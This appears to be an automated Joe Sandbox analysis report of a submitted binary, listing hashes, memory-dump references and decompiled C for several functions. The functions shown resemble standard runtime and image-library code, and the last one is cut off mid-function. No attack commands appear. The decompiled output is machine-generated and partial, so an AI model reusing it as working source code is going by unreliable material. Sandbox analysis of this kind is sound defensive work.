Yara matches

Similarity

API ID: _memmove
String ID: ()E$aTA
API String ID: 4104443479-1757895530
Opcode ID: 1207d2b001df0510bae5a7b47b5ad408ff73aae62e2c05123734f06757353d58
Instruction ID: a72233c241d048238e52f2ba24ca74ea457725bdc4a4ab438ac62aa032042a1e
Opcode Fuzzy Hash: 1207d2b001df0510bae5a7b47b5ad408ff73aae62e2c05123734f06757353d58
Instruction Fuzzy Hash: 1D327770A007259FDB24CF69D480A6EBBF1FF84304F54856ED88297391D778EA84CB99

Uniqueness

Uniqueness Score: -1,00%

Function 00402B78, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00402BDF

Strings

invalid string position, xrefs: 00402C03
string too long, xrefs: 00402C0D

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 28e2c6d06490011cd8d5be449ba8ee0393a2ac26057e39e8f237aa3d07675285
Instruction ID: 7ba1e052eb4b3b4145560671eb34979fc80c44b75ed159750e7d94764d9e937e
Opcode Fuzzy Hash: 28e2c6d06490011cd8d5be449ba8ee0393a2ac26057e39e8f237aa3d07675285
Instruction Fuzzy Hash: 4231B4313047019BD7349E2D9A88A1BB7B9AB41714B200D3FF4A2E76C1C7B4E94486A9

Uniqueness

Uniqueness Score: -1,00%

Function 0042BCEF, Relevance: 3.2, Strings: 2, Instructions: 710COMMON

Download Yara Rule

Strings

aTA, xrefs: 0042C660, 0042C646
'E, xrefs: 0042C43F

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: aTA$'E
API String ID: 0-2654289545
Opcode ID: 51c9b4cce2447d9df21614c5aa2e9cdc8254801dee679c4631e0281ad868e145
Instruction ID: 6d846d89d6ffd45ec8b6d26f0ef2dca48df3cce80b9ba0101d65a4c992c7e451
Opcode Fuzzy Hash: 51c9b4cce2447d9df21614c5aa2e9cdc8254801dee679c4631e0281ad868e145
Instruction Fuzzy Hash: 0352CE70A00A25CFCB28CF68D8906BEB7F2FF85311F54456ED88297791D738A985DB84

Uniqueness

Uniqueness Score: -1,00%

Function 00446972, Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00446972(void* __eflags, signed int* _a4) {
				void* __edi;
				void* _t16;
				void* _t20;
				intOrPtr _t24;
				int _t25;
				void* _t29;
				signed int* _t30;
				intOrPtr* _t31;

				_t1 = L0043CC0F(_t29, __eflags) + 0x9c; // 0x9c
				_t31 = _t1;
				_t16 = L00437E2A( *_t31);
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t31 + 0x10)) =  ~(_t16 - 3) + 1;
				_t20 = L00437E2A( *((intOrPtr*)(_t31 + 4)));
				_t30 = _a4;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t31 + 0x14)) =  ~(_t20 - 3) + 1;
				_t30[1] = _t30[1] & 0x00000000;
				if( *((intOrPtr*)(_t31 + 0x10)) == 0) {
					_t24 = E00446A48( *_t31);
				} else {
					_t24 = 2;
				}
				 *((intOrPtr*)(_t31 + 0xc)) = _t24;
				_t25 = EnumSystemLocalesW( &M00446A72, 1);
				if(( *_t30 & 0x00000100) == 0 || ( *_t30 & 0x00000200) == 0 || ( *_t30 & 0x00000007) == 0) {
					 *_t30 =  *_t30 & 0x00000000;
					return _t25;
				}
				return _t25;
			}

0x0044697c
0x0044697c
0x00446984
0x00446991
0x00446994
0x00446997
0x0044699c
0x004469a4
0x004469a7
0x004469aa
0x004469b4
0x004469bd
0x004469b6
0x004469b8
0x004469b8
0x004469ca
0x004469cd
0x004469d9
0x004469e8
0x00000000
0x004469e8
0x004469ee

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

_GetPrimaryLen.LIBCMT ref: 004469BD
EnumSystemLocalesW.KERNEL32(00446A72,00000001,000000A0,?,?,00446FFC,00000000,?,?,?,?,?,00000055), ref: 004469CD

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: EnumLocalesPrimarySystem__getptd_noexit
String ID:
API String ID: 1605451767-0
Opcode ID: d5bfe25cbf901656d0a556b987e5b2adbdf89684f741e93a45f21bf37ebbe823
Instruction ID: 7e05073c1b7eafd1388b5e71ada16b50a5c72221186ffe8cacad24aba10b719a
Opcode Fuzzy Hash: d5bfe25cbf901656d0a556b987e5b2adbdf89684f741e93a45f21bf37ebbe823
Instruction Fuzzy Hash: C201F2725503069FF730AF75D80AB66BBE0FF02716F21492EE489A61C1E7BCA454CB49

Uniqueness

Uniqueness Score: -1,00%

Function 00446E3A, Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00446D13,00000000,00000000,?), ref: 00446E64
_GetPrimaryLen.LIBCMT ref: 00446E83

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocalePrimary__getptd_noexit
String ID:
API String ID: 3580725100-0
Opcode ID: 36d66c19e4df5518d841029b9dc23780fc7467cc0b4e8f40d77c62cbca3523f1
Instruction ID: 1e7b29624efa877fe073b0d9615391f75a187a29f23b2020131500fcb63b8478
Opcode Fuzzy Hash: 36d66c19e4df5518d841029b9dc23780fc7467cc0b4e8f40d77c62cbca3523f1
Instruction Fuzzy Hash: 85F09636A10115BBFB246A71DC06BAF7698EB06754F22403BE905A3191EA78FD4086A9

Uniqueness

Uniqueness Score: -1,00%

Function 004469EF, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004469EF(void* __edi, void* __eflags, signed int* _a4) {
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t12;
				signed int* _t14;
				void* _t19;

				_t19 = L0043CC0F(__edi, __eflags);
				_t8 = L00437E2A( *((intOrPtr*)(_t19 + 0x9c)));
				asm("sbb eax, eax");
				_t11 =  ~(_t8 - 3) + 1;
				 *((intOrPtr*)(_t19 + 0xac)) = _t11;
				if(_t11 == 0) {
					_t12 = E00446A48( *((intOrPtr*)(_t19 + 0x9c)));
				} else {
					_t12 = 2;
				}
				 *((intOrPtr*)(_t19 + 0xa8)) = _t12;
				EnumSystemLocalesW( &M00446C65, 1);
				_t14 = _a4;
				if(( *_t14 & 0x00000004) == 0) {
					 *_t14 =  *_t14 & 0x00000000;
					return _t14;
				}
				return _t14;
			}

0x004469f8
0x00446a00
0x00446a0a
0x00446a0c
0x00446a0e
0x00446a14
0x00446a21
0x00446a16
0x00446a18
0x00446a18
0x00446a2e
0x00446a34
0x00446a3a
0x00446a41
0x00446a43
0x00000000
0x00446a43
0x00446a47

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

_GetPrimaryLen.LIBCMT ref: 00446A21
EnumSystemLocalesW.KERNEL32(00446C65,00000001,?,?,00446FC6,0043D1A1,?,?,00000055,?,?,0043D1A1,?,?,?), ref: 00446A34

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: EnumLocalesPrimarySystem__getptd_noexit
String ID:
API String ID: 1605451767-0
Opcode ID: 34b47aa5f1156e5209593e7d487ff2edfc921180a4da41a049c22638c440936c
Instruction ID: 648463025d11bb67efb084712b3f9a3c5e677abf299d1e0b40e2d09a61d8d5a4
Opcode Fuzzy Hash: 34b47aa5f1156e5209593e7d487ff2edfc921180a4da41a049c22638c440936c
Instruction Fuzzy Hash: 63F0EC71A507049FF7206B34EC46FA17BD5DB07715F11841BF889B61D1D6785C408B1E

Uniqueness

Uniqueness Score: -1,00%

Function 00437BE6, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00437BEB
UnhandledExceptionFilter.KERNEL32(?), ref: 00437BF4

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 77c5991e64899d78d6298039ac5167d482c53d5314c2ea8df4e7254a96c01c6b
Instruction ID: 719be356ef2a15edd6c58e62b1daa694a6d0d2d56d1d4781a598131c56b9e20e
Opcode Fuzzy Hash: 77c5991e64899d78d6298039ac5167d482c53d5314c2ea8df4e7254a96c01c6b
Instruction Fuzzy Hash: C8B09235444208ABCA002BD1EC1DB983F28EB06662F000020FA0D442608B7A5450CA99

Uniqueness

Uniqueness Score: -1,00%

Function 0040C360, Relevance: 3.0, Strings: 2, Instructions: 494
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0040C360(void* __fp0, intOrPtr* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _t304;
				short _t315;
				void* _t631;

				_t631 = __fp0;
				_v16 =  *_a4;
				asm("sbb eax, eax");
				_v12 =  ~( ~( *(_v16 + 0x10) & 0x00000004)) + 1;
				if(( *(_v16 + 0x10) & 0x00000002) != 0 || _a12 == _a16 && _a16 == _a20) {
					_v44 = 0;
				} else {
					_v44 = 1;
				}
				_v8 = _v44;
				if(_a8 > 0xff) {
					E0041B170( *((intOrPtr*)( *_v16)), "color-map index out of range");
				}
				if(_a28 == 3) {
					_a28 =  *((intOrPtr*)(_a4 + 0x20));
				}
				if(_a28 != 3) {
					if(_a28 != 4) {
						if(_a28 == 1 && (_v8 != 0 || _v12 == 2)) {
							_a12 =  *(0x44f150 + _a12 * 2) & 0x0000ffff;
							_a16 =  *(0x44f150 + _a16 * 2) & 0x0000ffff;
							_a20 =  *(0x44f150 + _a20 * 2) & 0x0000ffff;
							_a24 = _a24 * 0x101;
							_a28 = 2;
						}
					} else {
						_a12 = _a12 * 0x101;
						_a16 = _a16 * 0x101;
						_a20 = _a20 * 0x101;
						_a24 = _a24 * 0x101;
						_a28 = 2;
					}
				} else {
					_v20 =  *((intOrPtr*)(_a4 + 0x24));
					_push(_v20);
					_a12 = E00411930(_t631, _a12 * 0x101) & 0x0000ffff;
					_push(_v20);
					_a16 = E00411930(_t631, _a16 * 0x101) & 0x0000ffff;
					_push(_v20);
					_a20 = E00411930(_t631, _a20 * 0x101) & 0x0000ffff;
					if(_v8 != 0 || _v12 == 2) {
						_a24 = _a24 * 0x101;
						_a28 = 2;
					} else {
						_a12 = ( *(0x44f350 + (_a12 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a12 * 0x000000ff & 0x00007fff) * ( *((_a12 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
						_a16 = ( *(0x44f350 + (_a16 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a16 * 0x000000ff & 0x00007fff) * ( *((_a16 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
						_a20 = ( *(0x44f350 + (_a20 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a20 * 0x000000ff & 0x00007fff) * ( *((_a20 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
						_a28 = 1;
					}
				}
				if(_a28 == 2) {
					if(_v8 == 0) {
						if(_v12 == 1) {
							_a12 = ( *(0x44f350 + (_a12 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a12 * 0x000000ff & 0x00007fff) * ( *((_a12 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							_a16 = ( *(0x44f350 + (_a16 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a16 * 0x000000ff & 0x00007fff) * ( *((_a16 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							_a20 = ( *(0x44f350 + (_a20 * 0xff >> 0xf) * 2) & 0x0000ffff) + ((_a20 * 0x000000ff & 0x00007fff) * ( *((_a20 * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							_a24 = 0x807f + _a24 * 0xff >> 0x10;
							_a28 = 1;
						}
					} else {
						_v24 = _a12 * 0x1b38 + _a16 * 0x5b8a + _a20 * 0x93e;
						if(_v12 != 2) {
							_v24 = _v24 + 0x80 >> 8;
							_v24 = _v24 * 0xff;
							_v24 = ( *(0x44f350 + (_v24 + 0x40 >> 7 >> 0xf) * 2) & 0x0000ffff) + ((_v24 + 0x00000040 >> 0x00000007 & 0x00007fff) * ( *((_v24 + 0x40 >> 7 >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							_a24 = 0x807f + _a24 * 0xff >> 0x10;
							_a28 = 1;
						} else {
							_v24 = _v24 + 0x4000 >> 0xf;
						}
						_a16 = _v24;
						_a12 = _a16;
						_a20 = _a12;
					}
				}
				if(_a28 != _v12) {
					E0041B170( *((intOrPtr*)( *_v16)), "bad encoding (internal error)");
				}
				if(( *(_v16 + 0x10) & 0x00000020) == 0 || ( *(_v16 + 0x10) & 0x00000001) == 0) {
					_v48 = 0;
				} else {
					_v48 = 1;
				}
				_v32 = _v48;
				asm("sbb edx, edx");
				_v28 =  ~( *(_v16 + 0x10) & 0x00000010) & 0x00000002;
				if(_v12 != 2) {
					_v40 =  *((intOrPtr*)(_a4 + 0xc));
					_v40 = (( *(_v16 + 0x10) & 0x00000003) + 1) * _a8 + _v40;
					_t304 = _v16;
					_v56 = ( *(_t304 + 0x10) & 0x00000003) + 1;
					_v56 = _v56 - 1;
					if(_v56 > 3) {
						return _t304;
					}
					switch( *((intOrPtr*)(_v56 * 4 +  &M0040CA6C))) {
						case 0:
							L58:
							__eax = _v40;
							__eax = _v40 + _v32;
							 *__eax = _a16;
							return __eax;
						case 1:
							_v32 = _v32 ^ 0x00000001;
							__ecx = _v40;
							 *((char*)(_v40 + (_v32 ^ 0x00000001))) = _a24;
							goto L58;
						case 2:
							L56:
							 *((char*)(_v40 + (_v28 ^ 0x00000002) + _v32)) = _a20;
							 *((char*)(_v40 + _v32 + 1)) = _a16;
							_t309 = _v32 + _v28;
							 *((char*)(_v40 + _t309)) = _a12;
							return _t309;
						case 3:
							asm("sbb ecx, ecx");
							 *((char*)(_v40 + ( ~_v32 & 0xfffffffd) + 3)) = _a24;
							goto L56;
					}
				} else {
					_v36 =  *((intOrPtr*)(_a4 + 0xc));
					_v36 = _v36 + (( *(_v16 + 0x10) & 0x00000003) + 1) * _a8 * 2;
					_t315 = _v16;
					_v52 = ( *(_t315 + 0x10) & 0x00000003) + 1;
					_v52 = _v52 - 1;
					if(_v52 > 3) {
						L52:
						return _t315;
					}
					switch( *((intOrPtr*)(_v52 * 4 +  &M0040CA5C))) {
						case 0:
							L47:
							if(_a24 < 0xffff) {
								if(_a24 <= 0) {
									_a16 = 0;
								} else {
									_a16 = _a16 * _a24;
									__eax = _a16 * _a24 + 0x7fff;
									__ecx = 0xffff;
									__eax = (_a16 * _a24 + 0x7fff) / 0xffff;
									_a16 = (_a16 * _a24 + 0x7fff) / 0xffff;
								}
							}
							__eax = _v36;
							 *((short*)(_v36 + _v32 * 2)) = _a16;
							goto L52;
						case 1:
							_v32 = _v32 ^ 0x00000001;
							 *((short*)(_v36 + (_v32 ^ 0x00000001) * 2)) = _a24;
							goto L47;
						case 2:
							L41:
							if(_a24 < 0xffff) {
								if(_a24 <= 0) {
									_a20 = 0;
									_a16 = _a20;
									_a12 = _a16;
								} else {
									_a20 = (_a20 * _a24 + 0x7fff) / 0xffff;
									_a16 = (_a16 * _a24 + 0x7fff) / 0xffff;
									_a12 = (_a12 * _a24 + 0x7fff) / 0xffff;
								}
							}
							 *((short*)(_v36 + ((_v28 ^ 0x00000002) + _v32) * 2)) = _a20;
							 *((short*)(_v36 + 2 + _v32 * 2)) = _a16;
							_t315 = _a12;
							 *((short*)(_v36 + (_v32 + _v28) * 2)) = _t315;
							goto L52;
						case 3:
							asm("sbb ecx, ecx");
							 *((short*)(_v36 + (( ~_v32 & 0xfffffffd) + 3) * 2)) = _a24;
							goto L41;
					}
				}
			}

0x0040c360
0x0040c36b
0x0040c379
0x0040c380
0x0040c38c
0x0040c3a7
0x0040c39e
0x0040c39e
0x0040c39e
0x0040c3b1
0x0040c3bb
0x0040c3ca
0x0040c3ca
0x0040c3d3
0x0040c3f0
0x0040c3f0
0x0040c3f7
0x0040c573
0x0040c5b2
0x0040c5cb
0x0040c5d9
0x0040c5e7
0x0040c5f3
0x0040c5f6
0x0040c5f6
0x0040c575
0x0040c57e
0x0040c58a
0x0040c596
0x0040c5a2
0x0040c5a5
0x0040c5a5
0x0040c3fd
0x0040c403
0x0040c409
0x0040c41f
0x0040c425
0x0040c43b
0x0040c441
0x0040c457
0x0040c45e
0x0040c46f
0x0040c472
0x0040c47e
0x0040c4c7
0x0040c514
0x0040c560
0x0040c563
0x0040c563
0x0040c56a
0x0040c601
0x0040c60b
0x0040c6eb
0x0040c73b
0x0040c787
0x0040c7d3
0x0040c7e7
0x0040c7ea
0x0040c7ea
0x0040c611
0x0040c630
0x0040c637
0x0040c658
0x0040c664
0x0040c6b1
0x0040c6c6
0x0040c6c9
0x0040c639
0x0040c644
0x0040c644
0x0040c6d3
0x0040c6d9
0x0040c6df
0x0040c6df
0x0040c60b
0x0040c7f7
0x0040c806
0x0040c806
0x0040c814
0x0040c82a
0x0040c821
0x0040c821
0x0040c821
0x0040c834
0x0040c842
0x0040c847
0x0040c84e
0x0040c9b6
0x0040c9cc
0x0040c9cf
0x0040c9db
0x0040c9e4
0x0040c9eb
0x0040ca59
0x0040ca59
0x0040c9f0
0x00000000
0x0040ca4b
0x0040ca4b
0x0040ca4e
0x0040ca54
0x00000000
0x00000000
0x0040ca3f
0x0040ca42
0x0040ca48
0x00000000
0x00000000
0x0040ca0d
0x0040ca1c
0x0040ca28
0x0040ca2e
0x0040ca37
0x00000000
0x00000000
0x0040c9fc
0x0040ca0a
0x00000000
0x00000000
0x0040c854
0x0040c85a
0x0040c873
0x0040c876
0x0040c882
0x0040c88b
0x0040c892
0x00000000
0x00000000
0x00000000
0x0040c89b
0x00000000
0x0040c96d
0x0040c974
0x0040c97a
0x0040c996
0x0040c97c
0x0040c97f
0x0040c983
0x0040c98a
0x0040c98f
0x0040c991
0x0040c991
0x0040c97a
0x0040c9a0
0x0040c9a7
0x00000000
0x00000000
0x0040c95f
0x0040c969
0x00000000
0x00000000
0x0040c8ba
0x0040c8c1
0x0040c8c7
0x0040c913
0x0040c91d
0x0040c923
0x0040c8c9
0x0040c8de
0x0040c8f6
0x0040c90e
0x0040c90e
0x0040c8c7
0x0040c936
0x0040c944
0x0040c952
0x0040c956
0x00000000
0x00000000
0x0040c8a7
0x0040c8b6
0x00000000
0x00000000
0x0040c89b

Strings

color-map index out of range, xrefs: 0040C3BD
bad encoding (internal error), xrefs: 0040C7F9

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: bad encoding (internal error)$color-map index out of range
API String ID: 0-7351992
Opcode ID: 6567f1b7803820ce9d247bae00306e269a0cccad2174cfd9dfb4fdb8e05b9878
Instruction ID: 1015be313a0de33eb0144272418a7978dc045a130efedaf4117df005699c3a16
Opcode Fuzzy Hash: 6567f1b7803820ce9d247bae00306e269a0cccad2174cfd9dfb4fdb8e05b9878
Instruction Fuzzy Hash: D62241B5A1011ACBCB18CF14C991AFEB7B2FF94300F14827AE815AB795D338D961DB94

Uniqueness

Uniqueness Score: -1,00%

Function 00442269, Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb1f5fce5fe224e6eb93f2ee8cf78642c8e18eb2e2e33433817e10afbd960a4
Instruction ID: 7f8a791af69c4683e8170b45aa2cfd21f5b127b7b5774578521ba7c64a50307d
Opcode Fuzzy Hash: 2bb1f5fce5fe224e6eb93f2ee8cf78642c8e18eb2e2e33433817e10afbd960a4
Instruction Fuzzy Hash: 7D323722D25F014DE7239634CD22336A249AFB73C4F55D737F81AB5AA6EBA9C4C34109

Uniqueness

Uniqueness Score: -1,00%

Function 00404425, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404425(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x406500; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x406548 = 1;
										__eflags =  *0x406548;
										if( *0x406548 != 0) {
											goto L60;
										}
										_t84 =  *0x406500; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x406548 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x406500 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x406508 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x406504 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x406508 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x406508 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x406548 = 1;
							__eflags =  *0x406548;
							if( *0x406548 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x406508 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x406508 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
